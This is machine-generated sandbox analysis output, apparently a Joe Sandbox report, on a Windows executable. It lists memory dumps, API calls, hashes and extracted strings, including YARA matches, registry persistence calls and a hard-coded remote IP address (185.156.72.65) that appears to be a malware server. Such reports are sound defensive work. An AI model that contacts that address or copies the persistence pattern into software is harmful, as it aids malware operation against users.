                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0494A30B), ref: 0494A98C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 7?
                      • API String ID: 0-896780959
                      • Opcode ID: b487f5806ff1892b7d5e36683f9f46662d93992b97255c20add9fae71a038151
                      • Instruction ID: 2a76e96968a449c5eeebfbf354cd455cfd320f3eb07f54be21604ea17362102f
                      • Opcode Fuzzy Hash: b487f5806ff1892b7d5e36683f9f46662d93992b97255c20add9fae71a038151
                      • Instruction Fuzzy Hash: A5512BF3A081045FF3086E29EC6177AB7E9EFD4320F1A453DEAC6C7780E97958058696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 06{k
                      • API String ID: 0-3877807730
                      • Opcode ID: d0416fe68afa5011a417361f16b169d827cbca7ad782e42942dc49a95bd6ab6e
                      • Instruction ID: 5c221ce4a7ee0e3db005778c02378c1ba78fa86d6b5e2b99dce5c50ea151e5aa
                      • Opcode Fuzzy Hash: d0416fe68afa5011a417361f16b169d827cbca7ad782e42942dc49a95bd6ab6e
                      • Instruction Fuzzy Hash: AD5149F3A483005BF3085D6DECC576A77D6EB98330F2A463DEA98D7781E8799C044295
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: l
                      • API String ID: 0-2517025534
                      • Opcode ID: a11c5c867736b435dd32831c6686c69acb2212e67d4fd7207d0f44c678823977
                      • Instruction ID: bebdf19ee1d542e1cb15ac08f5236e30aa7fa929d7db2d6100a705795bf6b614
                      • Opcode Fuzzy Hash: a11c5c867736b435dd32831c6686c69acb2212e67d4fd7207d0f44c678823977
                      • Instruction Fuzzy Hash: 43112CB318D295BDF3118A105D11BFF7B59CB83731F38404AF44096583C29A0D499235
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                      • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                      • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16c2aee98bd05594f968ea65478791831a3887e4a24402c962bbb9d5fe12e01e
                      • Instruction ID: d626d19abd118888d2fb89f2a4e6a8889a37015e8ddef823b04fe4ef3171cf4d
                      • Opcode Fuzzy Hash: 16c2aee98bd05594f968ea65478791831a3887e4a24402c962bbb9d5fe12e01e
                      • Instruction Fuzzy Hash: 73816BF3F1162447F3644C39CC983A266839BA5325F2F82788E9DAB7C6D87E5C065384
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98841a0bc8215f9025ca7ddee284c1e8b50921566d93955f1eb25f52f7310989
                      • Instruction ID: 015be23ae8169566d1ac34c575411e3c3fb4db8f86681551922b42eafb30af45
                      • Opcode Fuzzy Hash: 98841a0bc8215f9025ca7ddee284c1e8b50921566d93955f1eb25f52f7310989
                      • Instruction Fuzzy Hash: F5512CF3E182145BF7042A39DC463BABAD6DBD0320F1B463DDA98D7784ED3D99058286
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b3efc5b6a7c2374225cca788a216978b4a9a7d158648fb2fda00111177835328
                      • Instruction ID: 16f68973e1a799fe4ea016ac4b5496697b8aeea3a235635ad3c46184584028be
                      • Opcode Fuzzy Hash: b3efc5b6a7c2374225cca788a216978b4a9a7d158648fb2fda00111177835328
                      • Instruction Fuzzy Hash: 0851D7B3A186109BE314AE2DDC8076AF7E5EF98720F17453DEAD8C3394EA7548018796
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cc5761e00bb99173c3af84b595a63c3981aaadf61e3f846bf6828a36bf4de641
                      • Instruction ID: 8c1a532e45a1e021206059b7088add1968df8d82200ea9c3d3fb65069f88468e
                      • Opcode Fuzzy Hash: cc5761e00bb99173c3af84b595a63c3981aaadf61e3f846bf6828a36bf4de641
                      • Instruction Fuzzy Hash: 33418FF361C6005FF3086A6CEC8577ABBD5EB98310F1A453DE7D5C3784EA7998008696
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: fa6b4651d7221cff094baf480b42453b6c69c455708c8eaf66ed9c9ed1b57600
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: E6112B7720014243DA598AFED4B4EB6F79DEFC5329B2C477AD0858B75AE122F144E600
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: 8a5cd3a7b95f6d1cedb65045da1f90a52a61a6071a3ad4ec5084ba056dedaf80
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: DC117072350100DFDB58DE55EC90FA673EAEB89620B1D8056E904CB315E675EC01C760
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: 2429803e5c0a4337ea3c502ce323077035bac9e0c6282ea3a7e09db8bb15e051
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: 6201A276A006149FDF21CF24CC08FAB33F9EFC6216F4544B5EA0A9B281E774B9458B90
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                      • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                      • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                      Strings
                      • WakeAllConditionVariable, xrefs: 00409C1D
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                      • kernel32.dll, xrefs: 00409C00
                      • SleepConditionVariableCS, xrefs: 00409C11
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 2565136772-3242537097
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                      • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                      • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                      • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                      • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0494C081
                      • ___TypeMatch.LIBVCRUNTIME ref: 0494C18F
                      • _UnwindNestedFrames.LIBCMT ref: 0494C2E1
                      • CallUnexpected.LIBVCRUNTIME ref: 0494C2FC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: d19d3c771868f603bdc4c70fa1cf47813a2bd2109d9732880470e4b32eaa9460
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 1CB14571902209EFDF29DFA4C880DAEB7B9BF88314F16416AE8116B211D771FA51CF91
                      APIs
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpenSleepValue
                      • String ID: 185.156.72.65$185.156.72.65$mixone
                      • API String ID: 4111408922-485810328
                      • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                      • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04949E22), ref: 04949E50
                      • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04949E22), ref: 04949E5B
                      • GetModuleHandleW.KERNEL32(0042000C,?,?,04949E22), ref: 04949E6C
                      • GetProcAddress.KERNEL32(00000000,00420028), ref: 04949E7E
                      • GetProcAddress.KERNEL32(00000000,00420044), ref: 04949E8C
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04949E22), ref: 04949EAF
                      • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04949ECB
                      • CloseHandle.KERNEL32(0042D060,?,?,04949E22), ref: 04949EDB
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID:
                      • API String ID: 2565136772-0
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 60f2d3ef1866f8ede7c1faaafbd31aa0a08048e47a3ccd64e449fc90f972ba62
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6A017571F80711ABE7205BB4FC0DF9B3AECAB88705B504135F905E2161DB74D9078A68
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                      • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction ID: 6d3a3cfc350efa397900819d80e266ca4b6c01479b302033a5c4270e7a4e237d
                      • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction Fuzzy Hash: E7B15A72A00365AFEB11CF64CC81BAE7BB9EF95314F244175ED04AF2A1D274B981C7A1
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                        • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                      • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65$string too long
                      • API String ID: 2123813255-2459586365
                      • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                      • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 0040B837
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                      • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                      • _ValidateLocalCookies.LIBCMT ref: 0040B948
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                      APIs
                      • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                      • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                      APIs
                      • GetLastError.KERNEL32(?,?,0494BC22,0494B1C6,0494A9D7), ref: 0494BC39
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0494BC47
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0494BC60
                      • SetLastError.KERNEL32(00000000,0494BC22,0494B1C6,0494A9D7), ref: 0494BCB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: 8bef0b2f46639e42fdef6b3747fab779de8755c2fad88a4b41a30f1e551f9359
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: D501D8322096119EB7352BFCFCC5E5B2A58EBC567D7214339E524550F1EF51B8016284
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 0494186C
                        • Part of subcall function 04949AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04949AF5
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418A2
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418D9
                      • Concurrency::cancel_current_task.LIBCPMT ref: 049419EE
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65
                      • API String ID: 2123813255-1765470537
                      • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction ID: d785850e2d3667b4c444f598f40c96018d7a3833132ec7e9d6bddf6031acaaf2
                      • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction Fuzzy Hash: A641C8B1A00305ABE7149FB4DC86F5AB6F8EFC9354F100639E95AD7280E771B944C7A1
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,79D989F6,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                      • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
